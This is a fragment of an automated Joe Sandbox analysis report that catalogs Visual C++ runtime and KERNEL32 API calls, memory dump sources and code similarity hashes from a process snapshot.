                                                                                                          • ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR100(00000001,?,00000000,00000000), ref: 6FDC2494
                                                                                                            • Part of subcall function 6FDC20F1: ??0exception@std@@QAE@ABQBD@Z.MSVCR100(6FDC1F83,?,6FDC1F83,00000001), ref: 6FDC2110
                                                                                                            • Part of subcall function 6FDC20F1: _CxxThrowException.MSVCR100(?,6FE20DAC,6FDC1F83), ref: 6FDC2125
                                                                                                          • ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR100(00000002,00000001,?,00000000,00000000), ref: 6FDC24A3
                                                                                                          • ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR100(00000003,00000002,00000001,?,00000000,00000000), ref: 6FDC24B2
                                                                                                          • ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR100(00000005,00000003,00000002,00000001,?,00000000,00000000), ref: 6FDC24C1
                                                                                                          • ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR100(00000006,00000005,00000003,00000002,00000001,?,00000000,00000000), ref: 6FDC24D0
                                                                                                          • ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR100(00000008,00000006,00000005,00000003,00000002,00000001,?,00000000,00000000), ref: 6FDC24DF
                                                                                                          • GetCurrentThread.KERNEL32 ref: 6FDC24FD
                                                                                                          • GetThreadPriority.KERNEL32(00000000), ref: 6FDC2504
                                                                                                          • ??2@YAPAXI@Z.MSVCR100(00000838), ref: 6FDC2605
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100 ref: 6FDDC19E
                                                                                                          • _invalid_parameter_noinfo.MSVCR100 ref: 6FDDC1A9
                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000009,?,000000FF,?,?,?), ref: 6FDDC20B
                                                                                                          • GetLastError.KERNEL32 ref: 6FDDC215
                                                                                                          • _isleadbyte_l.MSVCR100(?,?), ref: 6FDDC23B
                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,?), ref: 6FDDC266
                                                                                                          • _errno.MSVCR100 ref: 6FDDC26C
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          APIs
                                                                                                          • WideCharToMultiByte.KERNEL32(00000080,00000000,6FE245D0,00000001,?,?,00000000,?,?,?,?,6FE245D0,?), ref: 6FD9076B
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          APIs
                                                                                                          • HeapSetInformation.KERNEL32(00000000,00000001,00000000,00000000,00D022D8,00000010), ref: 00D01154
                                                                                                          • InterlockedCompareExchange.KERNEL32(00D03398,?,00000000), ref: 00D01171
                                                                                                          • Sleep.KERNEL32(000003E8), ref: 00D0118C
                                                                                                          • _amsg_exit.MSVCR100(0000001F), ref: 00D011A2
                                                                                                          • _initterm_e.MSVCR100(00D020DC,00D020E8), ref: 00D011C3
                                                                                                          • _initterm.MSVCR100(00D020D0,00D020D8), ref: 00D011F8
                                                                                                          • InterlockedExchange.KERNEL32(00D03398,00000000), ref: 00D01210
                                                                                                          • exit.MSVCR100(00000000), ref: 00D0126C
                                                                                                          • _XcptFilter.MSVCR100(?,?), ref: 00D0127E
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612452283.0000000000D01000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D00000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612359297.0000000000D00000.00000002.00000001.01000000.00000008.sdmp
                                                                                                          • Associated: 00000009.00000002.30612550523.0000000000D02000.00000004.00000001.01000000.00000008.sdmp
                                                                                                          • Associated: 00000009.00000002.30612649247.0000000000D04000.00000002.00000001.01000000.00000008.sdmp
                                                                                                          APIs
                                                                                                            • Part of subcall function 6FD806FC: GetLastError.KERNEL32(6FD731F8,?,6FD8081A,6FE18032), ref: 6FD80700
                                                                                                            • Part of subcall function 6FD806FC: __set_flsgetvalue.MSVCR100 ref: 6FD8070E
                                                                                                            • Part of subcall function 6FD806FC: SetLastError.KERNEL32(00000000), ref: 6FD80720
                                                                                                          • _calloc_crt.MSVCR100(00000086,00000002), ref: 6FDFC2D6
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          APIs
                                                                                                          • _lock.MSVCR100(0000000E,6FDF4FD8,00000010,6FDF3745,?,?), ref: 6FDF4EE3
                                                                                                            • Part of subcall function 6FD80910: EnterCriticalSection.KERNEL32(00000001,00000001,?,6FD81EE5,0000000D), ref: 6FD8092B
                                                                                                          • __unDNameHelper.MSVCR100(00000000,?,00000000,00002800,6FDF4FD8,00000010,6FDF3745,?,?), ref: 6FDF4F00
                                                                                                            • Part of subcall function 6FDF4E94: __unDName.MSVCR100(?,?,?,?,?,00000000,?,6FDF4F05,00000000,?,00000000,00002800,6FDF4FD8,00000010,6FDF3745), ref: 6FDF4EBD
                                                                                                          • _local_unwind4.MSVCR100(6FE24610,?,000000FE), ref: 6FDF4F1C
                                                                                                          • strlen.MSVCR100(00000000), ref: 6FDF4F2C
                                                                                                          • malloc.MSVCR100(00000008), ref: 6FDF4F50
                                                                                                          • malloc.MSVCR100(00000001), ref: 6FDF4F60
                                                                                                          • strcpy_s.MSVCR100(00000000,00000001,?), ref: 6FDF4F71
                                                                                                          • free.MSVCR100(?), ref: 6FDF4FA9
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Name__unmalloc$CriticalEnterHelperSection_local_unwind4_lockfreestrcpy_sstrlen
                                                                                                          • String ID:
                                                                                                          • API String ID: 1424006541-0
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100(?,?,?,?,6FD97ED4,?,?,?,?,00000000,?), ref: 6FD97F0C
                                                                                                          • _errno.MSVCR100(?,6FD97ED4,?,?,?,?,00000000,?), ref: 6FDA93FC
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(?,6FD97ED4,?,?,?,?,00000000,?), ref: 6FDA9407
                                                                                                          • _errno.MSVCR100(?,?,?,?,6FD97ED4,?,?,?,?,00000000,?), ref: 6FDA9425
                                                                                                          • _errno.MSVCR100 ref: 6FDA9432
                                                                                                          • _errno.MSVCR100 ref: 6FDA943C
                                                                                                          • _errno.MSVCR100 ref: 6FDA946C
                                                                                                          • _errno.MSVCR100 ref: 6FDA9476
                                                                                                          • _errno.MSVCR100 ref: 6FDA9489
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(?,?,?,?,6FD97ED4,?,?,?,?,00000000,?), ref: 6FDA9494
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno$_invalid_parameter_noinfo
                                                                                                          • String ID:
                                                                                                          • API String ID: 2819658684-0
                                                                                                          APIs
                                                                                                          • _lock.MSVCR100(00000007,6FD90D48,0000000C), ref: 6FD90CE5
                                                                                                            • Part of subcall function 6FD80910: EnterCriticalSection.KERNEL32(00000001,00000001,?,6FD81EE5,0000000D), ref: 6FD8092B
                                                                                                          • wcslen.MSVCR100(00000000,6FD90D48,0000000C), ref: 6FD90D65
                                                                                                          • calloc.MSVCR100(00000001,00000002,00000000,6FD90D48,0000000C), ref: 6FD90D70
                                                                                                          • wcscpy_s.MSVCR100(00000000,00000001,00000000), ref: 6FD90D87
                                                                                                          • _errno.MSVCR100(6FD90D48,0000000C), ref: 6FDB08C0
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(6FD90D48,0000000C), ref: 6FDB08CA
                                                                                                          • _errno.MSVCR100 ref: 6FDB08DB
                                                                                                          • _errno.MSVCR100 ref: 6FDB08E6
                                                                                                            • Part of subcall function 6FD90C66: wcslen.MSVCR100(00000000,?,00000000,?,6FD90D27,?,6FD90D48,0000000C), ref: 6FD90C88
                                                                                                            • Part of subcall function 6FD90C66: wcslen.MSVCR100(00000000,?,00000000,?,6FD90D27,?,6FD90D48,0000000C), ref: 6FD90C9B
                                                                                                            • Part of subcall function 6FD90C66: _wcsnicoll.MSVCR100(00000000,00000000,00000000,?,00000000,?,6FD90D27,?,6FD90D48,0000000C), ref: 6FD90CB8
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errnowcslen$CriticalEnterSection_invalid_parameter_noinfo_lock_wcsnicollcallocwcscpy_s
                                                                                                          • String ID:
                                                                                                          • API String ID: 505790351-0
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100 ref: 6FDFC3A2
                                                                                                          • _invalid_parameter_noinfo.MSVCR100 ref: 6FDFC3AC
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • wcslen.MSVCR100(?), ref: 6FDFC3CF
                                                                                                          • wcscpy_s.MSVCR100(?,?,?), ref: 6FDFC3DF
                                                                                                          • wcscat_s.MSVCR100(?,?,6FDB31F0), ref: 6FDFC3F2
                                                                                                          • _invoke_watson.MSVCR100(00000000,00000000,00000000,00000000,00000000), ref: 6FDFC405
                                                                                                          • _errno.MSVCR100 ref: 6FDFC40A
                                                                                                          • wcslen.MSVCR100(?,00000000), ref: 6FDFC412
                                                                                                          • wcslen.MSVCR100(?,?,00000000), ref: 6FDFC41C
                                                                                                          • _wcserror_s.MSVCR100(00000000,?,00000000), ref: 6FDFC426
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: wcslen$_errno$_invalid_parameter_invalid_parameter_noinfo_invoke_watson_wcserror_swcscat_swcscpy_s
                                                                                                          • String ID:
                                                                                                          • API String ID: 3148939141-0
                                                                                                          APIs
                                                                                                          • HeapReAlloc.KERNEL32(00000000,00000000,00000001,00000000,00000000,?,6FD84799,?,00000001,00000000,00000000,?,6FDB0617,00000000,00000010), ref: 6FD84701
                                                                                                          • malloc.MSVCR100(00000001,?,6FD84799,?,00000001,00000000,00000000,?,6FDB0617,00000000,00000010), ref: 6FD8477D
                                                                                                          • free.MSVCR100(00000000,00000000,?,6FD84799,?,00000001,00000000,00000000,?,6FDB0617,00000000,00000010), ref: 6FDAF35F
                                                                                                          • _callnewh.MSVCR100(00000001,?,6FD84799,?,00000001,00000000,00000000,?,6FDB0617,00000000,00000010), ref: 6FDAF37B
                                                                                                          • _callnewh.MSVCR100(00000001,00000000,00000000,?,6FD84799,?,00000001,00000000,00000000,?,6FDB0617,00000000,00000010), ref: 6FDAF38C
                                                                                                          • _errno.MSVCR100(00000000,00000000,?,6FD84799,?,00000001,00000000,00000000,?,6FDB0617,00000000,00000010), ref: 6FDAF392
                                                                                                          • _errno.MSVCR100(?,6FD84799,?,00000001,00000000,00000000,?,6FDB0617,00000000,00000010,?,?,?,?,?,6FD8AA03), ref: 6FDAF3A4
                                                                                                          • GetLastError.KERNEL32(?,6FD84799,?,00000001,00000000,00000000,?,6FDB0617,00000000,00000010,?,?,?,?,?,6FD8AA03), ref: 6FDAF3AB
                                                                                                          • _errno.MSVCR100(?,6FD84799,?,00000001,00000000,00000000,?,6FDB0617,00000000,00000010,?,?,?,?,?,6FD8AA03), ref: 6FDAF3BC
                                                                                                          • GetLastError.KERNEL32(?,6FD84799,?,00000001,00000000,00000000,?,6FDB0617,00000000,00000010,?,?,?,?,?,6FD8AA03), ref: 6FDAF3C3
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno$ErrorLast_callnewh$AllocHeapfreemalloc
                                                                                                          • String ID:
                                                                                                          • API String ID: 2627451454-0
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100 ref: 6FDCC611
                                                                                                          • _invalid_parameter_noinfo.MSVCR100 ref: 6FDCC61C
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • __set_flsgetvalue.MSVCR100 ref: 6FDCC626
                                                                                                          • _calloc_crt.MSVCR100(00000001,00000214), ref: 6FDCC632
                                                                                                          • _getptd.MSVCR100 ref: 6FDCC63F
                                                                                                          • _initptd.MSVCR100(00000000,?), ref: 6FDCC648
                                                                                                          • CreateThread.KERNEL32(?,?,6FDCC59C,00000000,?,?), ref: 6FDCC676
                                                                                                          • GetLastError.KERNEL32 ref: 6FDCC680
                                                                                                          • free.MSVCR100(00000000), ref: 6FDCC689
                                                                                                          • _dosmaperr.MSVCR100(00000000), ref: 6FDCC694
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CreateErrorLastThread__set_flsgetvalue_calloc_crt_dosmaperr_errno_getptd_initptd_invalid_parameter_invalid_parameter_noinfofree
                                                                                                          • String ID:
                                                                                                          • API String ID: 3414405836-0
                                                                                                          APIs
                                                                                                          • _isleadbyte_l.MSVCR100(?,?), ref: 6FD82CBF
                                                                                                          • _mbtowc_l.MSVCR100(?,?,?), ref: 6FD82D54
                                                                                                          • strlen.MSVCR100(6FDB3088), ref: 6FD82DDB
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _isleadbyte_l_mbtowc_lstrlen
                                                                                                          • String ID: $g
                                                                                                          • API String ID: 1777857954-3845294767
                                                                                                          APIs
                                                                                                          • malloc.MSVCR100(-00000008), ref: 6FDF2583
                                                                                                          • _freea_s.MSVCR100(?), ref: 6FDF25DB
                                                                                                          • _isleadbyte_l.MSVCR100(?,?,?,?,?,?,00000000,?,?,6FDF2A14,?,?), ref: 6FDF2645
                                                                                                          • _isleadbyte_l.MSVCR100(00000000,?,?,?,?,?,00000000,?,?,6FDF2A14,?,?), ref: 6FDF2723
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _isleadbyte_l$_freea_smalloc
                                                                                                          • String ID: a/p$am/pm
                                                                                                          • API String ID: 263439597-3206640213
                                                                                                          • Opcode ID: 9608b70dfb50415846026ecde6699a2b469ba4eca59d9b8e016d2001d6a91485
                                                                                                          • Instruction ID: 7a6a2ed43dfc9d70a30685189464feba09123acaacdf03346a758492304f5137
                                                                                                          • Opcode Fuzzy Hash: 9608b70dfb50415846026ecde6699a2b469ba4eca59d9b8e016d2001d6a91485
                                                                                                          • Instruction Fuzzy Hash: D3D1C2349163C6DADB858F68C850FE97BB0EF0A31EF12419BC8A09B251C731B947CB61
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: sqrt
                                                                                                          • String ID: (go$@go$Pgo$pgo$go
                                                                                                          • API String ID: 1201437784-4062922410
                                                                                                          • Opcode ID: ad43ab33aa7a10e04ea316c75b3a186b3798dcb6397dc0082929cdadc62878af
                                                                                                          • Instruction ID: 6f1e177eeefbd3f9c28022ce0f82a01245756b5723e102746940e68321c7d21f
                                                                                                          • Opcode Fuzzy Hash: ad43ab33aa7a10e04ea316c75b3a186b3798dcb6397dc0082929cdadc62878af
                                                                                                          • Instruction Fuzzy Hash: F94153A2D01E49E7DF092F64E91A1883FB4F74B761B720BC4D481A52A8FF3195798781
                                                                                                          APIs
                                                                                                          • _getptd.MSVCR100(?,?,?,?,?,?,?,6FD85088,00000014), ref: 6FD84F77
                                                                                                            • Part of subcall function 6FD85258: _getptd.MSVCR100(6FD852B8,0000000C,6FDA9FD5,?,?,6FD843AA,?), ref: 6FD85264
                                                                                                            • Part of subcall function 6FD85258: _lock.MSVCR100(0000000C), ref: 6FD8527B
                                                                                                          • _calloc_crt.MSVCR100(000000D8,00000001), ref: 6FD84F97
                                                                                                          • _lock.MSVCR100(0000000C), ref: 6FD84FAD
                                                                                                            • Part of subcall function 6FD80910: EnterCriticalSection.KERNEL32(00000001,00000001,?,6FD81EE5,0000000D), ref: 6FD8092B
                                                                                                            • Part of subcall function 6FD84D42: _unlock.MSVCR100(0000000C,6FD84FC9), ref: 6FD84D44
                                                                                                            • Part of subcall function 6FD851A2: strcmp.MSVCR100(?,00000048,?,?,?,00000001,00000000,00000000), ref: 6FD85218
                                                                                                          • strcmp.MSVCR100(00000000,6FE24BC0), ref: 6FD84FF0
                                                                                                          • _lock.MSVCR100(0000000C), ref: 6FD85001
                                                                                                          • _errno.MSVCR100(?,?,?,?,?,?,?,6FD85088,00000014), ref: 6FDB0C90
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(?,?,?,?,?,?,?,6FD85088,00000014), ref: 6FDB0C9B
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _lock$_getptdstrcmp$CriticalEnterSection_calloc_crt_errno_invalid_parameter_noinfo_unlock
                                                                                                          • String ID: Jo
                                                                                                          • API String ID: 1805727365-2441139153
                                                                                                          • Opcode ID: 11243904f1182261e9c6a70cc875751c9c8ac100d5982a0b87f373df5bbc7a34
                                                                                                          • Instruction ID: 5b95fa4f5211d45458401cd7dafafaef3528301755915aaaa49de1aa71bb1e89
                                                                                                          • Opcode Fuzzy Hash: 11243904f1182261e9c6a70cc875751c9c8ac100d5982a0b87f373df5bbc7a34
                                                                                                          • Instruction Fuzzy Hash: 3531CD71908304DBEB809FA89845B8D7BF4BF46368F20811EE8365B2C1DF74B5409A25
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100 ref: 6FDDA40B
                                                                                                          • _invalid_parameter_noinfo.MSVCR100 ref: 6FDDA416
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno_invalid_parameter_invalid_parameter_noinfo
                                                                                                          • String ID:
                                                                                                          • API String ID: 340685940-0
                                                                                                          • Opcode ID: 6790f5351a6c2a9ae733bfb45d1f12f1e995a3eb659152e61ed67d9000599df3
                                                                                                          • Instruction ID: 3bab059b5e4f1a925c9f45fab75bd16664fbf14480f71e6c3c969cdfa621ab6b
                                                                                                          • Opcode Fuzzy Hash: 6790f5351a6c2a9ae733bfb45d1f12f1e995a3eb659152e61ed67d9000599df3
                                                                                                          • Instruction Fuzzy Hash: 15911AB2E00718EBDB84DFE8DC84ADDB7B9AF48724F14812AF514E7291D774B9418B60
                                                                                                          APIs
                                                                                                          • wcscmp.MSVCR100(?,6FDB3014,00000000,-00000002,6FE25BD0), ref: 6FDCCBBD
                                                                                                          • wcscmp.MSVCR100(?,6FDCCCF8,00000000,-00000002,6FE25BD0), ref: 6FDCCBD4
